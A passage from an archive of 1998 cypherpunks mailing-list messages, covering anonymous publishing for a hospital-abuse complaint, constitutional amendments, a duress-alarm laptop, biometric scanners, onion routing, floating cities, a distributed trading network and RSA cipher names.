>specifically said she didn't want. Then, later, during the actual birth,
>the midwife let my friend's vagina tear horribly instead of giving her
>an episiotomy as she said "You want a natural birth...do it yourself"
>Then, my friends new baby was taken from her, and she didn't get to see
>the baby for three hours after the birth. The baby was subjected to
>tests and proceedures that my friend had specifically requested not be
>done, and the baby was given a bottle in spite of the fact that my
>friend wanted to nurse her baby. Anyway, my intent is to open a page to
>expose these so called 'medical professionals' for what they
>are.....butchers! What happened to my friend was pure and simple
>assault, but she has not much recourse, as this happened in a military
>hospital. 

You go to a military organization and expect otherwise?  
Meat is meat baby.

>Her husband, like mine is in the Army, and they are not very
>high ranking soldiers, so the risk of reprocussions (sp?) to them is
>very high if she takes action. 

Kiss hubby's career goodbye Ms. Jones, you've already complained too much.

I know that is the norm for most army
>hospitals, and I would like to open a *safe* arena for women to read and
>be warned of these people, by NAME and rank, and location, and also a
>*safe* place for them to post their horror stories with warnings also.
>Many people are afraid of being sued...I could care less tho my husband
>is a bit paranoid...   do you see what I am trying to say here? Can you
>help me? Please let me know as soon as possible :)
>Thanks!
>

You need to look into anonymous posting more than Eternity services,
if you are afraid of personal retribution.  And you need a lawyer to
advise on libel law.  But I don't believe you're subject to the UCMJ as
a wife.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	     Directorate of Intelligence, CIA
	     http://www.jya.com/cia-notes.htm
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 20 Jan 1998 06:38:46 +0800
To: cypherpunks@cyberpass.net
Subject: 'Twas brillig, and the vetter seems to boost haywire
In-Reply-To: <1.5.4.32.19980119032518.00b1fda4@pop.pipeline.com>
Message-ID: <v03102802b0e982e90a43@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:04 PM -0800 1/19/98, Ray Arachelian wrote:
>On Sun, 18 Jan 1998, John Young wrote:
>
>> There's vetting but mawky pleas swing
>> the censor, indeed, the vetter seems to boost haywire to keep the
>> mad buying. Is that not a Brit legacy, too?
>
>Erm, my universal gibberish translator is back for repairs from heavy
>damage by Toto's weird postings... 'could you translate the above
>paragraph for those of us in English speaking lands?

I used Alta Vista's Translation Service at
http://babelfish.altavista.digital.com/cgi-bin/translate? and selected the
"Youngspeak to English" option, with this slightly more comprehensible
result:

"There vetting, but mawky pretexts swing the censor indeed cousins seem to
load haywire in order to hold the furious purchase. Isn't that a legacy
Brit, also?"

I think it is saying something about how our British cousins get furious
when then have to buy censored legacy applications and the slithey toves
did gyre and gimble in the wabe.

--Tim May




The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 20 Jan 1998 04:39:12 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199801192108.PAA23118@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 19 Jan 1998 20:20:01 -0000
> From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
> Subject: Congress' *real* job...

> Be careful what you wish for. This Congress is far more likely to pass
> amendments nullifying the 2nd, the 1st, the 6th, the 4th, and others. And
> they'll probably rewrite the 13th to read "no involuntary servitude...unless
> we say so."

For Congress to pass a single amendment they must get 3/4 of the states to
ratify the amendment. That's the check that keeps Congress from going nuts
and gives the individual states a measure of equality.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Jones <kjones@vvm.com>
Date: Tue, 20 Jan 1998 05:16:56 +0800
To: cypherpunks@toad.com
Subject: Eternity service??
Message-ID: <34C3C17A.F464F403@vvm.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello....listen, I was referred to you by a friend of mine who is
helping me with a page I would like to create. I am a mom of three,
aspiring Doula and EMT, and an advocate for natural pregnancy,
childbirth, extended breastfeeding and attachment parenting. Here is why
I am writing to you: Recently I was to coach a good friend of mine
through her labor and birth. She very much wanted a natural birth and
had written a very specific birth plan and had planned on signing
waivers to release the hospital and docs from any legal action if
anything went wrong. When we went to the hospital, the midwife on duty
threw down her birth plan and told her that her child would be delivered
on HER terms (the midwife's) or not at all. She literally forced me to
leave my friend, and then had her physically restrained to insert IV's
and apply monitors which my friend had NOT consented to, and in fact had
specifically said she didn't want. Then, later, during the actual birth,
the midwife let my friend's vagina tear horribly instead of giving her
an episiotomy as she said "You want a natural birth...do it yourself"
Then, my friends new baby was taken from her, and she didn't get to see
the baby for three hours after the birth. The baby was subjected to
tests and proceedures that my friend had specifically requested not be
done, and the baby was given a bottle in spite of the fact that my
friend wanted to nurse her baby. Anyway, my intent is to open a page to
expose these so called 'medical professionals' for what they
are.....butchers! What happened to my friend was pure and simple
assault, but she has not much recourse, as this happened in a military
hospital. Her husband, like mine is in the Army, and they are not very
high ranking soldiers, so the risk of reprocussions (sp?) to them is
very high if she takes action. I know that is the norm for most army
hospitals, and I would like to open a *safe* arena for women to read and
be warned of these people, by NAME and rank, and location, and also a
*safe* place for them to post their horror stories with warnings also.
Many people are afraid of being sued...I could care less tho my husband
is a bit paranoid...   do you see what I am trying to say here? Can you
help me? Please let me know as soon as possible :)
Thanks!

--
             Kay Jones
  KayEC/KayTIS/KayKDZ/KeWEL/KayOfBoz
     http://www.vvm.com/~kjones
  *Peace On Earth Begins At Birth*
          ICQ: 2935300






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 20 Jan 1998 04:46:34 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Amending the Constitution
Message-ID: <199801192116.PAA23175@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It is of some import to note that the legaly amend the Constitution takes
considerably more than the 51% that those happy go lucky anarchists are so
fond of quoting...it actualy takes 75%.


				ARTICLE V. 
 
	[Constitution: how amended; proviso.] 
 
	The Congress, whenever two thirds of both Houses shall deem it 
necessary, shall propose Amendments to this Constitution, or, on the 
Application of the Legislatures of two thirds of the several States, shall 
call a Convention for proposing Amendments, which, in either Case, shall be 
valid to all Intents and Purposes, as Part of this Constitution, when ratified 
by the Legislatures of three fourths of the several States, or by Conventions 
of the three fourths thereof, as the one or the other Mode of Ratification 
may be proposed by the Congress; Provided that no Amendment which shall be 
made prior to the Year One thousand eight hundred and eight shall in any 
Manner affect the first and fourth Clauses in the Ninth Section of the first 
Article; and that no State, without its Consent, shall be deprived of it's 
equal Suffrage in the Senate. 

 

    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 20 Jan 1998 05:47:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: British Ministers Adopt Unbreakable Crypto
In-Reply-To: <199801152113.NAA15458@comsec.com>
Message-ID: <199801192139.PAA16260@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
>LONDON (AP) -- It's a briefcase even James Bond could love.
> 
>Britain's more adventurous Cabinet ministers soon will be spiriting
>laptop computers inside their signature ``Red Box'' briefcases,
>complete with fingerprint recognition systems and silent alarms.
>
[.....]
>
>``There is even a duress finger,'' Rushworth said. ``That is for if a
>terrorist or gunman has a gun to the minister's head forcing him to
>open the computer. It will appear to function normally but doesn't,
>and sends a silent alarm to the Cabinet Office.''

This is INSANE.  How could someone be so stupid as to announce
such a feature in a newspaper.  I guess this means that if a
terrorist sees a Cabinet minister with such a computer, he had
better shoot to kill.

The whole point of a feature like this is that its existence is secret.
Someone is NOT paying attention.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis,MN  55419       Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Tue, 20 Jan 1998 08:57:15 +0800
To: Tim May <cypherpunks@toad.com
Subject: Re: [Fwd: [cpj:265] COS]
In-Reply-To: <34774099.4F5E@dev.null>
Message-ID: <v03102803b0e9993982a3@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:39 PM -0700 11/22/97, Tim May wrote:
>At 12:06 PM -0700 11/22/97, TruthMonger wrote:
>>Have you heard of a Mac compatible OS called "COS" from Omega in East
>>Germany?
>>I just found an article about it in Japanese Mac mag and that says Omega
>>announced the OS 11/13 at German MacWorldExpo.
>...
>>There's an interview with Omega's president in the article saying the OS
>>runs on 030, 040 & PowerPC without MacROM inside. So bunch of Mac clones
>>and CHRP mother boards from Taiwan etc may find a way....
>

Any reason someone couldn't sell a generic (e.g., CHRP-like) PowerPC platform which can has at switch-selectable space for at least two OS boot SRAMs?  Ship it with Linux, but let the customer load whatever boot and OS they want.  There, of course, would be nothing the OEM could do if someone anonymously posted a MacOS compatible boot on a .warez group which purchasers subsequently loaded along with their separately purchased copy of MacOS 8-)

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 20 Jan 1998 12:11:36 +0800
To: cypherpunks@cyberpass.net
Subject: Ocean going cities
Message-ID: <v040039bdb0e974c732cd@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 16 Jan 1998 16:32:41 -0500
From: <testarne@media.mit.edu>
To: technomads@UCSD.EDU
Subject: Ocean going cities


Just read in an architecture rag called "Metropolis" about floating
cities for the rich!  I guess being a nomad is becoming chic.

Anyways, the two ships are

ResidenSea   958ft long with 250  1100-3200 sq ft homes ranging from
$1.2-$4.3 million each.  driving range putting green 2 pools, helipad
gardens, retractable marina.  According to the mag, this one looks like it
will get built with construction to start soon.

Freedom Ship  4320 ft  25 stories  for 65,000 people starting at
$93,000  includes library school bank hotel hospital, light
manufacturing and 2 landing strips!!!  How Stephensonesque.

I'll be very depressed if the commercial folks do this before the
hackers.  Now, I wonder where I put that decommissioned aircraft
carrier?   :-)

						Thad Starner
						MIT Media Laboratory
						Wearable Computing Project

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Tue, 20 Jan 1998 06:46:29 +0800
To: cypherpunks@www.video-collage.com
Subject: Distributed stock trading system
Message-ID: <199801192238.QAA03188@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I would like to hear your feedback on a project that I have just
thought about.

It is called a Distributed Asset Trading Network. It consists of
Traders and Nodes. They trade Products (asset classes). A Product may
be an Intel share, or a bond, or an option on S&P 500, or whatever. Who
and how defines what the Product unit is is beyond the scope of this
document. 

Each Node in the Network is a clearing corporation that is supposed
to be a legitimate operation. To cover possible liabilities, Nodes can
post [ecash] bonds to each other. They are ultimately liable for all
counterparty defaults in Trades.

Traders are clients of Nodes. They have Accounts. To buy or sell Products,
they place Orders to these Nodes. The Nodes broadcast the Orders and
collect Potential Trades (opposing orders that have not been filled yet).
Nodes may have Policies that require Traders to meet certain requirements,
in order to avoid potential liability. (ie, to sell stock, you have to
have it on your Account, or have enough equity to cover the short sale
liabilities, etc).

The receiving Node has a short period of time (seconds) to decide which
counterparties and which amounts to choose. The sending Node acquires
Locks on the submitted Potential Trades and is liable to produce the
Asset (or Cash) if the positive response comes back within that time
period.

This architecture can create a trading environment that is a) independent
of borders and national laws, at least to some extent and b) eliminates
certain forms of arbitrage, and c) more resistant to denial of service
attacks (??), and possibly eliminates the bid-ask spreads and a whole
lot of highly-paid intermediaries, and c) potentially increases privacy
for transactions.

The technical issues that are open, at the moment, are 1) clock
synchronization, 2) the need for a central authority to clear liability
issues and 3) potential denial of service attacks through acquiring too
many locks (again, maybe with the proper liability agreement, it is not
an issue).

I think that such a system is not all that impossible to develop. Whether
it will, or can be made to, work in the technical and social environment
that we have is another question.

I am curious if something like this has aleready been implemented.

Thank you.


----------------------------------------------------------------------------
char*p="char*p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

                \=/,         _-===-_-====-_-===-_-==========-_-====-_
                |  @___oo   (                                        )_
      /\  /\   / (___,,,}_--=                                          )
     ) /^\) ^\/ _)        =__       Anything is good and useful if    )
     )   /^\/   _)          (_                                        )
     )   _ /  / _)            (                                        )
 /\  )/\/ ||  | )_)            (_       it's made of chocolate.       )
<  >      |(,,) )__)             (                                     )
 ||      /    \)___)\             (_                                 __)
 | \____(      )___) )___           -==-_____-=====-_____-=====-___==
  \______(_______;;; __;;;





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Tue, 20 Jan 1998 06:06:35 +0800
To: John Young <jya@pipeline.com>
Subject: Re: let's do it: NYT ad with hash of fingerprints (fwd)
In-Reply-To: <1.5.4.32.19980119032518.00b1fda4@pop.pipeline.com>
Message-ID: <Pine.SUN.3.96.980119170133.26286E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 18 Jan 1998, John Young wrote:

> There's vetting but mawky pleas swing
> the censor, indeed, the vetter seems to boost haywire to keep the 
> mad buying. Is that not a Brit legacy, too?

Erm, my universal gibberish translator is back for repairs from heavy
damage by Toto's weird postings... 'could you translate the above
paragraph for those of us in English speaking lands?

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 20 Jan 1998 07:35:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: British Ministers Adopt Unbreakable Crypto
In-Reply-To: <199801192139.PAA16260@mixer.visi.com>
Message-ID: <199801192330.RAA09810@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier writes:

> >``There is even a duress finger,'' Rushworth said. ``That is for if a
> >terrorist or gunman has a gun to the minister's head forcing him to
> >open the computer. It will appear to function normally but doesn't,
> >and sends a silent alarm to the Cabinet Office.''

> This is INSANE.  How could someone be so stupid as to announce
> such a feature in a newspaper.  I guess this means that if a
> terrorist sees a Cabinet minister with such a computer, he had
> better shoot to kill.

> The whole point of a feature like this is that its existence is secret.
> Someone is NOT paying attention.

I don't think the machine is going to do any silent alarming in the
grounded Faraday cage with the 10 severed fingers lying on a plate next to
it.

Anyone know what they actually use to sector encrypt the file system
on these things?  It would be somewhat amusing if it were snake oil
based.

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 20 Jan 1998 07:11:55 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: www.video-collage.com - another CDR node?
Message-ID: <199801192335.RAA23901@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Is the www.video-collage.com a new node on the remailer network?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Tue, 20 Jan 1998 02:57:34 +0800
To: shamrock@cypherpunks.to
Subject: Re: Onion routing
In-Reply-To: <Pine.BSF.3.96.980119102223.9263B-100000@pakastelohi.cypherpunks.to>
Message-ID: <9801191721.AA52458@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain



> Furthermore, it must be impossible to discern indiviual messages, meaning
> connections being opened or  closed. Which requires Pipenet, possibly the
> worst bandwidth burner ever  invented. :-)

With Onion Routing, eavesdroppers cannot see connections being opened
and closed, but all the Onion Routers do.

How is it done in Pipenet? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Mon, 19 Jan 1998 17:11:08 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: (eternity) Covert Superhighway - the missing component?
In-Reply-To: <199801141241.MAA00398@server.eternity.org>
Message-ID: <Pine.LNX.3.93.980119182924.205A-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 14 Jan 1998, Adam Back wrote:

> Ross Anderson <Ross.Anderson@cl.cam.ac.uk>

[...]

> > channel. Let's call it the `Covert Superhighway'. How do we build it?
> 
> Some ideas:

[...]

> - become a spammer, or employ some spammers.  Spammers use the hit and
>   run approach with disposable accounts; with sufficient availability
>   of accounts, and the economic incentive they seem to flourish in
>   spite of intense displeasure of recipients.

This is a bad idear,  firstly it is moraly and ethicly wrong.  Spammers
take resoursers without providing anything of value in return.  

Worce then this it is too nocitable.  For a covert channel we wont
something that peaple don't worry about and don't pay much attention to.
Peaple tend to subject spam to alot of anylises.

However it may be possable to incorparte subliminal infomation inside
NoCeM posts.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNMMC0aQK0ynCmdStAQF1cAP6A+E+/myX2rYojosizVzrQ+rzwwiIOvqH
oc1fOytw/x1T3yVKOx7hzSq+GAXfZiPQx1QRfy2Lpa8CIPdw/gLDutRdqcI4o22y
Kx/9FD4mCzojQRN8Pen7aewxSE1FnMLfG/E6FxdJhWKQ3P8xuLUemrmw5xNR3QiC
Km5ozQ3g9bw=
=nCIS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Mon, 19 Jan 1998 18:01:46 +0800
To: "Robert A. Costner" <pooh@efga.org>
Subject: Re: (eternity) Re: remailer resistancs to attack
In-Reply-To: <3.0.3.32.19980116045037.031a4b40@mail.atl.bellsouth.net>
Message-ID: <Pine.LNX.3.93.980119192756.205C-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 16 Jan 1998, Robert A. Costner wrote:

[...]

> The remailer network is not designed
> to be robust or fault tolerant.  There is no error notification to the
> user.  
[...]
How would this be implermented.  If you are able to trace backwards so you
know who to notify then you don't have anonminity.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNMMPA6QK0ynCmdStAQG8qgP8ClMmPfeGkEJ9Fydfb5i3n1ARuKRV+nET
cLIt9GfU9vlrashs+2Shx/c8bz67+rl0eOAdgNBbDlW8Fe1Qzb9EfRCn24f+ZL0K
+7PyBc+2YTfWOTrmEGihNuLnKUtFUNRrjyC0+PHWDCTOZx+W9LzAxKsbw8TzPWAF
zMG5ooTbM+E=
=2cCi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Hackworth <hackworth@vipul.net>
Date: Mon, 19 Jan 1998 23:17:04 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: religious discrimination alive and well in NEW Zealand (fwd)
Message-ID: <199801191955.TAA00182@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Hmm. 

freedom@freedom-press.co.nz wrote:

> this is not a spam 
> you may not be interested in this religion but the powers to 
> be are attacking a basic human right. So whats new.?
> read how a new zealand couple are being prosecuted for their
> religious beliefs 
>  http://www.freedom-press.co.nz
> Read the kiwi gemstone file,you may be suprised
>  just email us for a copy.put" kiwi "in the suject line
> or join are mailing list for the latest in govt conspiracies
> just type" join" in the suject line
> The truth shall set you free (perhaps)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 20 Jan 1998 12:20:05 +0800
To: Lucky Green <emc@wire.insync.net>
Subject: Re: British Ministers Adopt Unbreakable Crypto
In-Reply-To: <199801192330.RAA09810@wire.insync.net>
Message-ID: <v03102803b0e9d51b59ea@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:53 PM -0800 1/19/98, Lucky Green wrote:

>This reminds me of a conversation I had at a recent biometrics exhibition.
>One company exhibited hand shape scanners, such as those installed at San
>Francisco International Airport to control access to "sensitive" parts of
>the airport. [Do not pass security, go straight the "clean" area].
>
>I asked the exhibitor if the scanner would grant access to a hand not
>attached to the body. At first, the exhibitor paled and replied that if a
>severed hand was part of my thread model (not using these terms), then my
>"facility had larger problems than could be solved by access control". The
>booth staff, visibly shaken by my insinuation that there are people that
>might severe somebody's had to gain access to an environment, kept
>following me with their eyes as I walked away from the exhibit.
>
>Seems these amateurs hadn't considered that somebody getting ready to blow
>up an airplane with 250 passengers on board just might have relatively few
>qualms about detaching the hand of one Filipino airport janitor on his way
>to work.

Well, the droids they hire to man their booths are Happy People.

No wonder they missed the point of Oklahoma City.

>To their credit, the EyeDentify booth staff (the world's sole manufacturer
>of retinal scanners), knew what they were doing. Their system checks for
>blood flow, etc. A removed eye or a cadaver won't do. Now there is a
>company that understands security.

Biometric on removed eyeballs was old hat in "Thunderball," as I was
approaching adulthood. That the Disneyfied world fails to understand
realitities is hardly surprising.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Tue, 20 Jan 1998 04:26:29 +0800
To: cypherpunks@ssz.com
Subject: Congress' *real* job...
Message-ID: <19980119202001.27861.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



>Congress' real job should not be passing laws providing funding, prohibiting
>activities, etc. It *should* be in creating and passing Constitutional
>amendments per the 10th that re-define the responsibilities and duties of
>the federal government within the changing millieu of the current society.
>This way the people via their state representatives have a much closer input
>into what the feds are actualy enpowered to do and to who.

Be careful what you wish for. This Congress is far more likely to pass
amendments nullifying the 2nd, the 1st, the 6th, the 4th, and others. And
they'll probably rewrite the 13th to read "no involuntary servitude...unless
we say so."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Jones <kjones@vvm.com>
Date: Tue, 20 Jan 1998 10:46:48 +0800
To: David Honig <honig@otc.net>
Subject: Re: Eternity service??
In-Reply-To: <3.0.5.32.19980119142119.007d3610@206.40.207.40>
Message-ID: <34C40DE1.F78B500E@vvm.com>
MIME-Version: 1.0
Content-Type: text/plain





David Honig wrote:

> Wait 18 years, then her child can sue the hospital.

My point is to prevent this from happening again....I know I can't change the
world, but if I can help just one person from having this happen to them, I
will have done my job....

>
>
>
>
> Not very assertive, are you folks?

It wasn't my job to be assertive...and what does a private do when a major
tells him what the deal is??

>
>
>
>
> Kiss hubby's career goodbye Ms. Jones, you've already complained too much.

I don't believe that...

>
>
> You need to look into anonymous posting more than Eternity services,
> if you are afraid of personal retribution.  And you need a lawyer to
> advise on libel law.  But I don't believe you're subject to the UCMJ as
> a wife.

Thanks for your help anyway...useless as it may be.. thanks at least for the
prompt if fucked reply.

>
>
> ------------------------------------------------------------
>       David Honig                   Orbit Technology
>      honig@otc.net                  Intaanetto Jigyoubu
>
>         "How do you know you are not being deceived?"
>         ---A Compendium of Analytic TradeCraft Notes,
>              Directorate of Intelligence, CIA
>              http://www.jya.com/cia-notes.htm



--
             Kay Jones
  KayEC/KayTIS/KayKDZ/KeWEL/KayOfBoz
     http://www.vvm.com/~kjones
  *Peace On Earth Begins At Birth*
          ICQ: 2935300






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Tue, 20 Jan 1998 13:38:23 +0800
To: cypherpunks@toad.com
Subject: RC1 and RC3 ??
Message-ID: <19980120052835.13042.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Why doesn't it have RC1 and RC3 though there are RC2,
RC4 and RC5 of RSADSI RC series ?


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Goetze <cg@miaow.com>
Date: Tue, 20 Jan 1998 13:58:24 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: Ocean going cities
In-Reply-To: <v040039bdb0e974c732cd@[139.167.130.248]>
Message-ID: <3.0.5.32.19980119214101.00875100@shell5.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



http://freedomshipcity/

Seems like a pipe dream - and wouldn't stand any serious test of war - how
are you going to feed 60.000 people without outside help? I'd still be
excited if they build it...

At 04:23 PM 1/19/98 -0500, Robert Hettinga wrote:
>Just read in an architecture rag called "Metropolis" about floating
>cities for the rich!  I guess being a nomad is becoming chic.
>
>Anyways, the two ships are
>
>ResidenSea   958ft long with 250  1100-3200 sq ft homes ranging from
>$1.2-$4.3 million each.  driving range putting green 2 pools, helipad
>gardens, retractable marina.  According to the mag, this one looks like it
>will get built with construction to start soon.
>
>Freedom Ship  4320 ft  25 stories  for 65,000 people starting at
>$93,000  includes library school bank hotel hospital, light
>manufacturing and 2 landing strips!!!  How Stephensonesque.
>
>I'll be very depressed if the commercial folks do this before the
>hackers.  Now, I wonder where I put that decommissioned aircraft
>carrier?   :-)
>
>						Thad Starner
>						MIT Media Laboratory
>						Wearable Computing Project
>
>--- end forwarded text
>
>
>
>-----------------
>Robert Hettinga (rah@shipwright.com), Philodox
>e$, 44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>The e$ Home Page: http://www.shipwright.com/
>Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>
>
>
>
>
--
cg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 20 Jan 1998 15:17:57 +0800
To: "Nobuki Nakatuji" <bd1011@hotmail.com>
Subject: Re: RC1 and RC3 ??
In-Reply-To: <19980120052835.13042.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980119230720.00aaa510@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 09:28 PM 1/19/98 PST, Nobuki Nakatuji wrote:
>
>Why doesn't it have RC1 and RC3 though there are RC2,
>RC4 and RC5 of RSADSI RC series ?

